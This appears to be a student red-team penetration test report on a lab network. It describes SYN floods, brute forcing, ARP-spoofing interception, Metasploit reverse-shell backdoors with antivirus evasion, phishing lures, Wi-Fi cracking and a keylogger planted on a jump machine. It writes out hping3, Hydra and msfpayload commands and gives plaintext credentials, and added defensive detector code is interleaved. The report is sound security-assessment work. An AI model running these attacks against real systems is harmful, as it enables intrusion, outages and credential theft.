Penetration Test
RED TEAM 2
Ahmet Shkoza
Erion Sina
Fabiola Xhelili
Fjoralba Shehaj
Gerhard Arifi
Igli Shkreta
Matilda Hala
Romina Marqeshi
28 March 2019
1 Contents
1 CONTENTS
2 TABLE OF FIGURES
3 EXECUTIVE SUMMARY
4 INTRODUCTION
5 SCOPE
6 SCANNING
6.1 NMAP
6.2 TCP SCAN
6.3 SYN SCAN
6.4 SPARTA
6.5 NESSUS
6.6 ACUNETIX
7 ATTACK PHASE
7.1 DDOS
7.1.1 TCP SYN FLOOD
7.1.2 GOLDEN EYE
7.2 BRUTE FORCE ATTACK
7.3 MAN IN THE MIDDLE ATTACK
7.3.1 SNIFFING FTP PACKETS WITH DSNIFF- ARP SPOOFING MITM ATTACK
7.3.2 SNIFFING WITH CAIN & ABEL
8 FTP SERVER FUZZING
9 BACKDOOR
9.1 BACKDOOR CREATED USING METASPLOIT
9.2 CREATE FUD BACKDOOR TO BYPASS ANTIVIRUS
10 SNMP SNIFF
11 SOCIAL ENGINEERING
11.1 CREATION OF A ZIPBOMB AND SENDING IT WITH A MAIL.
11.2 SENDING MALICIOUS FILES
12 REMOTE DESKTOP PROTOCOL (RDP) SCAN AND ATTACK
13 HACKING WI-FI
14 HACKING THE JUMP MACHINE
15 SUMMARY
2 Table of Figures
Figure 1. Network scanning using nmap
Figure 6. SPARTA Scan, In the hosts field, the ip address of the target defined in the left and in the right are shown the results
Figure 23. Detailed information of the certificates
Figure 44. Deauthentication
Figure 45. Sniffing from wireless traffic of the AP
Figure 52. Victim machine-cmd
RED TEAM 2 was engaged to conduct a focused External Network Penetration Test on a
quantified number of services in the network of BLUE TEAM 2. The purpose of this
engagement was to identify and prioritize the security vulnerabilities on the identified systems.
The engagement was launched on 01.03.2019 and included 27 days of planning, testing,
analyzing and documentation.
The following security issues were identified during the course of the Network Penetration Test:
4 Introduction
The penetration test conducted by RED TEAM 2 followed all the stages of a standard external
penetration test: Planning, Gathering Information, Discovering Vulnerabilities and Reporting.
The team gathered on 1 March in a kick-off meeting where we discussed planning and defined the
scope and goals of the project. Furthermore, a team leader was selected to be in charge of
controlling all the phases of the project and supporting all the members.
Team leader: Ahmet Shkoza
Table 1 – Kick off meeting
Fjoralba Shehaj
Erion Sina
8. Man In the Middle Attack Gerhard Arifi 22/03/2019
Ahmet Shkoza
Erion Sina
5 Scope
The scope of the project is to discover the infrastructure of BLUE TEAM 2 and to attack it in
order to gain access to their services. The project will evaluate the security weaknesses of BLUE
TEAM 2’s network systems, identify gaps in system security, and prepare penetration test
recommendations to reduce the threat.
All activities were conducted in a manner that simulated a malicious actor engaged in a targeted
attack against Blue Team 2 with the goals of:
- Identifying if a remote attacker could penetrate Blue Team 2 infrastructure.
- Determining the impact of a security breach on the confidentiality of the infrastructure
- Determining the impact of a security breach on the availability of Blue Team 2
information systems
Efforts were placed on the identification and exploitation of security weaknesses that could allow
a remote attacker to gain unauthorized access to organizational data. The attacks were conducted
with the level of access that a general Internet user would have. The assessment was conducted
in accordance with all tests and actions being conducted under controlled conditions.
RED TEAM 2 will use Kali Linux’s tools to perform the attacks.
The tools that will be used are:
12. Windows Spy Keylogger
File Server
Web Server
Mail Server
Wi-Fi AP
6 Scanning
In the pre-scanning phase, the services offered by Blue Team 2 were already specified. To get
deeper insight, different scanning tools were used in order to gather as much information as
possible for penetrating the system. For the purposes of this assessment, the only information
our team had for scanning was the WAN interface IP address (the public IP address of the
firewall, which is the gateway to the whole system).
Operating System used: Kali Linux, Windows
Tools used: nmap, Metasploit, Nessus, Sparta, Acunetix
On the first day, all the ports appeared filtered. The next day we continued scanning and found
that port 21 was open. This result told us that Blue Team 2 had an FTP service which was
unencrypted. This finding was important for the next step of attacking the FTP server.
6.1 Nmap
Figure 2. Port scanning using nmap
Figure 3. Port scanning using Metasploit
The number of threads can also be increased to help the scan run faster. To be safe, we can set
this to something like 8. Now we're ready to start the scan. In Metasploit, the run command is
simply an alias for exploit, so it will do the exact same thing. Given that we are only conducting
scans, run seems more appropriate, though it really doesn't matter.
Figure 4. TCP scanning using Metasploit
Figure 5. SYN scanning using Metasploit
6.4 Sparta
Sparta also has nmap integrated, so the results from both tools are almost the same, but Sparta
is a GUI application and runs more tools, such as Nikto and Hydra.
Figure 6. SPARTA scan. The Hosts field on the left shows the IP address of the target; the
results are shown on the right.
Results of Sparta:
- FTP server is Filezilla ftpd: port 21 is unencrypted while port 990 is encrypted
- Web Server is Apache, the framework used for the web is Laravel
- Firewall is based on Nginx Server
- Ticketing System – a portable version of OpenSSH, a free implementation of the Secure
Shell protocol in Ubuntu Linux
6.5 Nessus
Nessus is used to get a more detailed report that we could use to find breaches on the target
system. It identifies vulnerabilities such as software flaws, missing patches, malware, and
misconfigurations across the target operating systems and applications.
Figure 2 shows the detailed report which lists the Vulnerabilities and their level of severity.
Result of Nessus:
Figure 7- Nessus scanner results
6.6 Acunetix
To get a better view of the web server and framework, we used the Acunetix scanner. Acunetix
tests for SQL Injection, XSS, XXE, SSRF, Host Header Injection and other web vulnerabilities.
The scan was run several times and the results were the same each time:
Directory listing makes it easier to identify the resources at a given path and can expose
sensitive files; it does not necessarily create a security vulnerability, provided that the
resources cannot be accessed by unauthorized parties.
Suggested solution: correctly configure the web server for the paths beneath the web root.
Alerts related to cookies indicate that the cookie can be accessed over non-secure channels.
What makes this application interesting is that it is more web-oriented and can give hints of
problems related to the web service.
Figure 8- executive summary from acunetix scanner
The framework used is Laravel, which comes out of the box with security features already
implemented. Hence, most of the vulnerabilities detected by Acunetix have a very low likelihood
and severity, and are difficult to exploit.
The scanning phase was repeated every day as a check.
7 Attack phase
7.1 DDoS
A distributed denial of service (DDoS) attack is an attempt to make a service unavailable. Unlike
other kinds of attacks, which establish a foothold or hijack data, DDoS attacks do not threaten
sensitive information; they only attempt to make a service unavailable to legitimate users. In
our scenario, we used DDoS to take down the web application firewall.
Network and Transport Layer Attacks
These types of attacks target the transport and network layers. They usually consist of
volumetric attacks that aim to overwhelm the target machine with malicious traffic, consuming
all resources and making the server unresponsive.
7.1.1 TCP SYN FLOOD
The aim of a SYN flood is to send many SYN packets to the server while ignoring the SYN+ACK
packets returned by the server.
If an attacker sends enough SYN packets, this will overwhelm the server because servers are
limited in the number of concurrent TCP connections. If the server reaches its limit, it cannot
establish new TCP connections until the existing connections in the SYN-RCVD state time out.
In order to perform SYN flood attacks we used hping3.
hping3 is a free packet generator and analyzer for the TCP/IP protocol. Hping is one of the
de facto tools for security auditing and testing of firewalls and networks, and was used to
exploit the Idle Scan scanning technique now implemented in the Nmap port scanner. The new
version of hping, hping3, is scriptable using the Tcl language and implements an engine for
string-based, human-readable description of TCP/IP packets, so that the programmer can write
scripts related to low-level TCP/IP packet manipulation and analysis in a very short time.
root@kali:~# hping3 -S --flood -V -p TARGET_PORT TARGET_SITE
hping is a command-line oriented TCP/IP packet assembler/analyzer. It supports TCP, UDP,
ICMP and RAW-IP protocols, has a traceroute mode, the ability to send files over a covert
channel, and many other features.
In our case it was used in traceroute mode, was verbose in ICMP mode, and it successfully
shut down the firewall, making its public IP unreachable.
We also tried an advanced SYN flood with random source IP, different data size, and window size:
root@kali:~# hping3 -c 20000 -d 120 -S -w 64 -p TARGET_PORT --flood --rand-source
TARGET_SITE
--flood: send packets as fast as possible
--rand-source: random source address
-c, --count: packet count
-d, --data: data size
-S, --syn: set SYN flag
-w, --win: winsize (default 64)
-p, --destport: destination port (default 0)
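Seen from the defending side, the random source addresses used above defeat per-address rate limits, so a detector has to count half-open handshakes per listening service instead. The following is an added example, not part of the original report; the packet-summary layout, the addresses and the 128-entry threshold are assumptions made for illustration.

```python
from collections import Counter, defaultdict


def make_sample():
    """Constructed capture summary: (time_s, src_ip, src_port, dst_ip, dst_port, flag).
    Flag "S" is a client SYN, "A" the client's final handshake ACK, "R" a reset."""
    server = ("203.0.113.5", 443)
    pkts = []
    # Two legitimate clients complete the three-way handshake.
    for i, src in enumerate(["198.51.100.10", "198.51.100.11"]):
        pkts.append((0.10 * i, src, 40000 + i, *server, "S"))
        pkts.append((0.10 * i + 0.05, src, 40000 + i, *server, "A"))
    # Flood: 300 SYNs from rotating spoofed sources, never followed by an ACK.
    for i in range(300):
        pkts.append((1.0 + i * 0.001, f"192.0.2.{i % 250 + 1}", 1024 + i, *server, "S"))
    return sorted(pkts)


def half_open(packets):
    """Map each (dst_ip, dst_port) to the client endpoints still waiting in SYN-RCVD."""
    pending = defaultdict(set)
    for _ts, src, sport, dst, dport, flag in packets:
        if flag == "S":
            pending[(dst, dport)].add((src, sport))
        elif flag in ("A", "R"):
            pending[(dst, dport)].discard((src, sport))
    return pending


def detect_syn_flood(packets, max_half_open=128):
    """Alert per service when half-open handshakes exceed max_half_open (assumed limit)."""
    syns = Counter((dst, dport) for _t, _s, _sp, dst, dport, flag in packets if flag == "S")
    alerts = []
    for service, conns in half_open(packets).items():
        if len(conns) > max_half_open:
            per_source = Counter(src for src, _port in conns)
            alerts.append({
                "service": service,
                "half_open": len(conns),
                "distinct_sources": len(per_source),
                # A per-source limit would only ever see this many from one address.
                "busiest_source": per_source.most_common(1)[0][1],
                "completed_ratio": round(1 - len(conns) / syns[service], 3),
            })
    return alerts


if __name__ == "__main__":
    for alert in detect_syn_flood(make_sample()):
        print(alert)
```

On a Linux server the live equivalent of `half_open` is the number of sockets in the SYN-RECV state, and SYN cookies (`net.ipv4.tcp_syncookies`) keep the listener accepting connections while that number is high.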
7.1.2 GOLDEN EYE
GoldenEye is an HTTP Denial of Service tool written in Python. It uses KeepAlive paired with
Cache-Control options to persist socket connections, busting through caching (when possible)
until it consumes all available sockets on an HTTP/S server.
GoldenEye changes the generated requests dynamically: it randomizes user agents, referrers and
almost all of the various parameters used.
Our attack parameters:
Number of workers:10
Connection/wrk: 500
NoSSLcheck: True (as their firewall has a self-signed ssl certificate)
Method : GET
7.2 Brute Force Attack
Our team put great effort into carrying out a brute force attack, but unfortunately it was
unsuccessful. The tool used for cracking the password was Hydra, as it is the best
password cracking tool. As shown in the figure below, the passwords were all encrypted
very well and we could not crack any.
For brute forcing, Hydra needs a list of passwords. There are lots of password lists available.
The password list is pre-installed on Kali Linux and can be found at the following location:
/root/Desktop/bruteforce-database-master/word.lst
The command used in Kali Linux was:
# hydra -l admin -P /root/Desktop/bruteforce-database-master/word.lst -e ns -m https: 10.100.200.34:3333 -vV 10.100.200.34 http-get
The option “l” tells the username or login to use.
Next comes the capital “P” option which provides the word list to use. Hydra will pick up each
line as a single password and use it.
The option “-e ns” is used to try "n" null password, "s" login as pass.
The option -m provides the list of servers to be attacked in parallel, one entry per line.
The “v” option is for verbose and the capital “V” option is for showing every password being
tried. Last comes the host/IP address followed by the service to crack.
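A run like the one above sends one HTTP request per candidate password, so on the target it appears as a burst of 401 responses for one username from one source. The detector below is an added example, not part of the original report; it assumes the service writes a combined-format access log, and the log lines, addresses and thresholds are constructed.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta, timezone

# Combined-log-style line: ip ident user [timestamp] "request" status bytes
LINE = re.compile(
    r'(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] "[^"]*" (?P<status>\d{3}) \S+'
)
TS_FORMAT = "%d/%b/%Y:%H:%M:%S %z"


def sample_log():
    """Constructed log: one source guessing 'admin', one user who mistypes twice."""
    start = datetime(2019, 3, 28, 10, 0, 0, tzinfo=timezone.utc)
    row = '{ip} - {user} [{ts}] "GET / HTTP/1.1" {status} 381'
    lines = [
        row.format(ip="192.0.2.50", user="admin", status=401,
                   ts=(start + timedelta(seconds=n)).strftime(TS_FORMAT))
        for n in range(40)
    ]
    for n, status in enumerate((401, 401, 200)):
        ts = (start + timedelta(seconds=5 + 20 * n)).strftime(TS_FORMAT)
        lines.append(row.format(ip="198.51.100.7", user="dekra", ts=ts, status=status))
    return lines


def parse(line):
    """Return (ip, user, timestamp, status) or None for lines in another format."""
    m = LINE.match(line)
    if m is None:
        return None
    return m["ip"], m["user"], datetime.strptime(m["ts"], TS_FORMAT), int(m["status"])


def detect_bruteforce(lines, max_failures=10, window=timedelta(seconds=60)):
    """Flag (ip, user) pairs with more than max_failures 401s inside the window.

    Each finding also records whether a 2xx response followed, which is the
    event that turns a noisy guessing run into an incident."""
    recent = defaultdict(deque)
    findings = {}
    for line in lines:
        rec = parse(line)
        if rec is None:
            continue
        ip, user, ts, status = rec
        key = (ip, user)
        if status == 401:
            q = recent[key]
            q.append(ts)
            while ts - q[0] > window:      # drop failures older than the window
                q.popleft()
            if len(q) > max_failures:
                findings.setdefault(key, {"crossed_at": ts, "later_success": False})
        elif key in findings and 200 <= status < 300:
            findings[key]["later_success"] = True
    return findings


if __name__ == "__main__":
    for key, info in detect_bruteforce(sample_log()).items():
        print(key, info)
```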
Figure 11. Brute force with Hydra
Another step was trying to crack the username and password from the Sparta application. The
files used for this attack were txt files containing guessed words for the passwords.
The target IP: Public IP of the firewall
Target Port: 3333
Command used: Send to brute
Service: https-post
Username known: admin or Dekra
7.3 Man In the Middle Attack
Scenario:
The first step is to configure our attacking machine to enable packet forwarding. This allows
our attacking machine to pose as the router, tricking the victim machine into thinking it is
connecting to the router when it is really connecting to the attacking machine.
For packet forwarding, you need to open a new terminal and type
“echo 1 > /proc/sys/net/ipv4/ip_forward”.
Our Target IP address will be :
The next step is to set up arpspoof between the victim and the router. Arpspoof is a command
line utility that allows us to intercept packets on a switched LAN. This is an extremely
effective way of sniffing traffic on a switch.
In the screenshot above, we successfully sniffed the login and password information of the FTP
protocol.
Recommendation:
1- Disk Quotas
2- Access by IP
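ARP spoofing of the kind described in this section leaves a visible trace in the victim's ARP cache: the gateway's IP address starts resolving to the attacker's MAC address. The check below is an added example, not part of the original report; it compares two snapshots in the format printed by `arp -an` on Linux, and all addresses in the snapshots are constructed.

```python
import re
from collections import defaultdict

# Entry format printed by `arp -an` on Linux (net-tools).
ARP_LINE = re.compile(r"\((?P<ip>[\d.]+)\) at (?P<mac>[0-9a-fA-F:]{17})")

# Constructed snapshots of one client's ARP cache (all addresses are made up).
BASELINE = """\
? (192.168.56.1) at 02:00:00:00:00:01 [ether] on eth0
? (192.168.56.20) at 02:00:00:00:00:20 [ether] on eth0
? (192.168.56.66) at 02:00:00:00:00:66 [ether] on eth0
"""
DURING_ATTACK = """\
? (192.168.56.1) at 02:00:00:00:00:66 [ether] on eth0
? (192.168.56.20) at 02:00:00:00:00:20 [ether] on eth0
? (192.168.56.66) at 02:00:00:00:00:66 [ether] on eth0
? (192.168.56.30) at <incomplete> on eth0
"""


def parse_arp_table(text):
    """Return {ip: mac} for resolved entries; '<incomplete>' rows are skipped."""
    matches = map(ARP_LINE.search, text.splitlines())
    return {m["ip"]: m["mac"].lower() for m in matches if m}


def find_spoofing(baseline, current, gateway_ip):
    """Compare a trusted snapshot with the current one and list suspicious bindings."""
    findings = []
    # 1. An IP whose MAC changed; a change on the gateway is the classic MITM sign.
    for ip, mac in sorted(current.items()):
        known = baseline.get(ip)
        if known and known != mac:
            severity = "critical" if ip == gateway_ip else "warning"
            findings.append((severity, f"{ip} moved from {known} to {mac}"))
    # 2. One MAC answering for several IPs: the spoofing host also holds its own IP.
    owners = defaultdict(list)
    for ip, mac in current.items():
        owners[mac].append(ip)
    for mac, ips in sorted(owners.items()):
        if len(ips) > 1:
            findings.append(("critical", f"{mac} answers for {', '.join(sorted(ips))}"))
    return findings


if __name__ == "__main__":
    before = parse_arp_table(BASELINE)
    now = parse_arp_table(DURING_ATTACK)
    for severity, message in find_spoofing(before, now, "192.168.56.1"):
        print(severity, message)
```

A MAC that legitimately answers for several addresses (a router doing proxy ARP, a host with secondary IPs) will also trigger the second rule, so the baseline should be taken on a known-good network.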
7.3.2 SNIFFING WITH CAIN & ABEL
Step 1:
First we turned off the windows firewall or any other third-party firewall, so that all the packets
are captured efficiently.
Step 2:
Open Cain and Abel tool
Step 3:
Then we switched to Sniffer Tab and clicked Configure in the main menu to configure our
packet listening adapter.
Step 4:
Selected the appropriate network adapter for our network that we wanted to sniff the packets for
plain-text passwords. Click Ok.
Figure 17. Selection of network adapter
Step 5:
The Green Adapter must be clicked to turn on the network adapter that we just configured.
Step 6:
By scanning the network we populated the table with all PCs on our LAN.
Step 7:
Now select the APR tab at the bottom as shown, then click in the upper right pane. Clicking
that area enables the blue plus (“+”) icon. Press that blue plus (“+”) icon.
Figure 20. Selecting APR tab
Step 8:
Now we need to select the firewall's IP address and click OK. This means that we want to listen
to every packet that is sent to the firewall. If we select any other IP address in our LAN, then
we can listen only to that particular host on the network. Since the router responds to all the
requests of hosts connected to the LAN, we can listen to all the hosts. Now we click the
Yellow Circle icon as shown. This means that we are starting ARP poisoning.
Figure 21. Packet Listening to select the Firewall IP
In the picture below we can see the full poisoning for the firewall IP address.
Figure 22. Poisoning for the firewall IP address
Step 9:
Figure 23. Sniffing results
Figure 24. Certificates of the visited websites
By right-clicking on a specific certificate file we can get valuable information about different
subjects of that certificate, as shown in the picture below.
Figure 25. Detailed information of the certificates
Aside from finding the vulnerabilities of the first interface with Blue Team 2, which was
the firewall, the next step was testing the services the Blue Team has created.
8 FTP Server Fuzzing
FTP is a relatively simple protocol, but due to the high number of commands and various
parameters, an FTP server may be vulnerable to buffer overflow.
Tool used: Infigo FTPStress Fuzzer, it allows a user to define FTP commands that need to be
tested and the length and type of data that will be sent to the target application.
Operating system: Windows
9 Backdoor
Username : dekra
Password: Bt22019
We tried to realize a backdoor by inserting a zip file in their File Server that contained a .exe file
created with Metasploit.
The file was created with the following command:
root@Kali: /opt/metasploit-4.4.0/msf3# msfpayload windows/meterpreter/reverse_tcp lhost=
10.100.200.x lport=4444 x > passwordet e juja te leshit.exe
After creating the file, we zipped it so that the payload would appear to be only a few KB. The
name of the file was chosen to arouse the curiosity of Blue Team 2, so that they would open the
zip. Had they opened the zip, the payload could have made the server unreachable. Because
Blue Team 2 was aware of our attacks, this scenario never succeeded. Nevertheless, we
continue to have access to their FTP server without being noticed or blocked by them. This is
a critical finding because in a real scenario, we could have access to important documents and
files.
Format : Executable
Payload library : Msfvenom
Sign Executable : Microsoft Certificate (preventing a pop-up warning that alerts the user that
the executable is from an unknown source; instead it will be recognized as a Microsoft app)
Check file hash & file on Virustotal.com
Figure 32. Backdoor session created successfully
Now if we type “sysinfo” we get the information from the Windows 10 machine. If we need to
get a full shell session instead of using the Metasploit’s one, we have to type “shell”.
Metasploit has a script named persistence that can enable us to set up a persistent Meterpreter
(listener) on the victim's system. In our case the persistence step was not successful because of
the security restrictions.
10 SNMP sniff
The Simple Network Management Protocol (SNMP) is the most basic method of gathering
bandwidth and network usage data. It can be used to monitor bandwidth usage of routers and
switches port-by-port, as well as device readings like memory, CPU load etc.
By monitoring the SNMP traffic we could find the SNMP password. In our case SNMP was not
configured and version 1 was used, which in itself is a vulnerability because the communication
is unencrypted.
If our scenario had worked and SNMP had been configured, we could then have set up a network
monitor. By entering the discovered SNMP password, we could discover all their network devices
and take control of them.
11 Social engineering
11.1 Creation of a zipbomb and sending it with a mail.
A zip bomb, also known as a Zip of Death or decompression bomb, is a malicious archive file
designed to crash or render useless the program or system reading it.
Operating system used: Windows
Scenario: The folder is sent as a report from the IT Department, and the employee, not knowing
what exactly the ITCheckResults.zip contains, opens it.
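A mail gateway or file server can screen an attachment like this before anything is unpacked. The following is an added example, not part of the original report, using Python's standard `zipfile` module: it checks the declared sizes first and then enforces a byte budget on what decompression actually produces. The thresholds and the sample archive (a text file plus a run of zero bytes) are constructed assumptions.

```python
import io
import zipfile

NESTED_SUFFIXES = (".zip", ".gz", ".bz2", ".xz", ".7z", ".rar")


def build_sample(padding_bytes):
    """Constructed test archive: a short text file plus a run of zero bytes."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("summary.txt", "Quarterly check results: all hosts reachable.\n")
        zf.writestr("padding.bin", b"\0" * padding_bytes)
    return buf.getvalue()


def inspect_zip(data, max_total=1024 * 1024, max_ratio=100):
    """Read only the archive directory and report declared sizes before extracting."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        infos = zf.infolist()
    declared = sum(i.file_size for i in infos)
    packed = max(1, sum(i.compress_size for i in infos))
    nested = [i.filename for i in infos if i.filename.lower().endswith(NESTED_SUFFIXES)]
    ratio = declared / packed
    return {
        "declared_bytes": declared,
        "ratio": round(ratio, 1),
        "nested_archives": nested,   # inner archives need the same check recursively
        "suspicious": declared > max_total or ratio > max_ratio or bool(nested),
    }


def extract_with_budget(data, budget):
    """Decompress in 64 KiB chunks and abort once more than `budget` bytes were produced."""
    out, used = {}, 0
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            parts = []
            with zf.open(info) as member:
                for chunk in iter(lambda: member.read(64 * 1024), b""):
                    used += len(chunk)
                    if used > budget:
                        raise ValueError(f"decompression budget exceeded in {info.filename}")
                    parts.append(chunk)
            out[info.filename] = b"".join(parts)
    return out


if __name__ == "__main__":
    attachment = build_sample(2 * 1024 * 1024)
    print(len(attachment), "bytes on the wire ->", inspect_zip(attachment))
```

The budget is counted over the whole archive rather than per member, so many medium-sized files cannot add up past the limit unnoticed.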
11.2 Sending malicious files
Tool used: Metasploit Framework
Vulnerability exploited: the Adobe Reader ‘util.printf()’ JavaScript Function Stack Buffer
Overflow
Step 1: Enter the module of adobe_utilprintf
Step 2: Use reverse shell (setting payload)
Step 3: Setting localhost and localport (the IP address to which the target machine connects to,
the port that the listener binds to)
Step 4: Creation of the malicious file
Step 5: Setting up the listener to capture the reverse connection
The mail can be sent using a little script in the Kali terminal, or simply sent as an ordinary
user would do, by attaching the file to the e-mail.
Figure 37. Reverse TCP
In a real-life scenario, the file would be opened by an employee who is not aware of the
risk. In this case, Blue Team 2 was aware of the attacks that Red Team 2 was carrying out, so
they didn’t click on the file.
12 Remote Desktop Protocol (RDP) scan and attack
From the information we gathered during our scanning sessions and enumeration, we found
that their RDP service is enabled and uses port 3390 (instead of the default 3389).
To identify whether the host is vulnerable to an RDP attack, we’ll use the MS12-020-check
exploit from Metasploit.
Framework : Metasploit
Module(s) : scanner/rdp/ms12_020_check , dos/windows/rdp/ms12_020_maxchannelids
MS12-020-check : this vulnerability could allow remote code execution if an attacker sends a
sequence of specially crafted RDP packets to an affected system.
https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2012/ms12-020
Results: From the output of the Metasploit module we received “Service Unreachable” after
sending the crafted RDP packets, which means that we were able to disrupt their RDP service for
some seconds, or this may be a false positive alarm.
Improvements
Reference : https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2012/ms12-020
13 Hacking Wi-Fi
For this hacking method we need a wireless network adapter that supports monitor mode. Our
laptop’s wireless network card could also work, but generally an external card with extended
range capability is advised. In our testing we have used a USB WiFi Wireless Adapter Ethernet
Dual Antenna Long Range, like the one in the picture below, with a 150 Mbps capability.
Step 1.
Figure 42. Wireless traffic monitor
Step 2.
Figure 43. Target Victim
Step 3.
In our next step we focus our efforts on the Blue Team AP, on one channel, and capture traffic
data from it. We use the following command:
Step 4.
In order to capture the encrypted password, we need to have the client authenticate against
the AP. If they're already authenticated, we can de-authenticate them (kick them off) and
their system will automatically re-authenticate, whereby we can grab their encrypted
password in the process. To make this process possible, we use the following command:
Figure 44. Deauthentication
Now we wait until we sniff enough packets from the wireless traffic of the AP, in order to get the
WPA handshake.
Step 5.
Now we have our Wteam2.cap, which contains the encrypted password. Our last step is to
crack the password from this file. There are several methods for cracking an encrypted
password. If we have a good wordlist we try the aircrack-ng command, because it has a high
testing capability, depending on our hardware. So now we test the Wteam2 packets
file against our wordlist, which contains a high number of possible passwords.
14 Hacking the Jump Machine
The main purpose of this kind of attack is to reach the jump machine that the target IT admins
use to log in to their environment, with the final goal of obtaining users and passwords. To
make this possible we decided to first hack a local PC we were using in our class, supposing
that the image used by KPT is the same everywhere (including the jump machine). Once we have
the local Admin password (which can be the same on every PC of KPT), we can control the jump
machine.
4. Decrypt Hashes with online decryptor (www.onlinehashcrack.com)
6. Open CMD of the target victim PC with PsTools (psexec command)
After logging in to our compromised PC with the local Admin account (pcadmin), we will
run the target PC command prompt using PsExec of PsTools.
9. Disable Firewall (Windows Defender)
In this step we will temporarily disable Windows Defender.
11. Excluding “kot” folder from firewall
In this way we are safe to proceed with copying the tool and installing it in this excluded path.
13. Testing the keylogger is active
In this step we simulate the victim typing and we see the log file being populated.
2. Finding the User and Password of Domain User (potentially domain admin)
4. Login to Windows machine and confirming that the found credentials are working
In this step we will use the username and password extracted from the logs to log in to their
environment (in this case a Windows machine). The certificate acceptance prompt
means that our credentials are the right ones.
5. Finding the IP of DNS (potentially the Domain Controller IP)
After login we figure out (from the enabled Roles) that this machine is not their most
important one (Hyper-V or Domain Controller). The next step will be to reach the DC.
6. Login to the Windows Machine (which turns out to be their DC and Hyper-V Server):
Using the same credentials we were able to log in to their Domain Controller, which has the
AD, DNS and Hyper-V roles enabled.
7. Hello Team
No comment..
10. Exploring the Firewall
In this step we will login and explore their Firewall.
11. No NAT configured for VPN peer (means that VPN does not work)
The VPN peer is not accessible from outside, which means that the VPN peer cannot be
reached.
15 Summary
Initial reconnaissance of the Blue Team network resulted in the discovery of a pfSense appliance
as the firewall and a Snort monitoring system, which isolate the internal systems from
external attacks.
The results provided us with a listing of specific services to target for this assessment. An
attack revealed the credentials of the FTP server. After a few trials we were not able to gain
access to this server by uncovering the password via brute force with Hydra. Another attempt was
to prove its vulnerability to buffer overflow.
After obtaining access to the FTP server, we kept it and added malicious files that would
crash the system, leading to data corruption.
We also created a malicious file and a zip bomb in order to send them via e-mail (the target was
the SMTP server) using social engineering. The moment an employee inside the ‘Company’ clicks
the files, which have legitimate and realistic names, the application crashes and service is
denied to legitimate users.
After a closer examination, we discovered that the RDP service of the target system is vulnerable
to remote code execution through a flow of crafted RDP packets; after exploitation the RDP
service was disrupted for some seconds, or this may be a false positive alarm.
A successful exploitation consisted of creating a persistent backdoor with reverse HTTP, which
could get shell access to the target the moment the user clicks it (what may bring the
user to click is social engineering).
Privilege escalation through Windows flaws made it possible for us to install a keylogger on the
Blue Team 2 client PC. After successful installation, we were able to capture all typed passwords
and therefore gained access to all their infrastructure.
Blue Team 2 suffered a series of control failures, which led to a potential compromise of
sensitive system assets.
These failures would have had a dramatic effect on the services that this ‘Company’ offers if a
malicious party had exploited them.
FTP and Web service were vulnerable to MITM attack, also the creation of backdoor which
cannot be detected from the antivirus,
The specific goals of the penetration test were stated as:
- Identifying if a remote attacker could penetrate the Blue Team 2 firewall
- Determining the impact of a security breach on:
- Confidentiality of the company’s information
- Availability of Blue Team 2 information systems
These goals of the penetration test were met. A targeted attack against Blue Team 2 can result in
a potential compromise of organizational assets.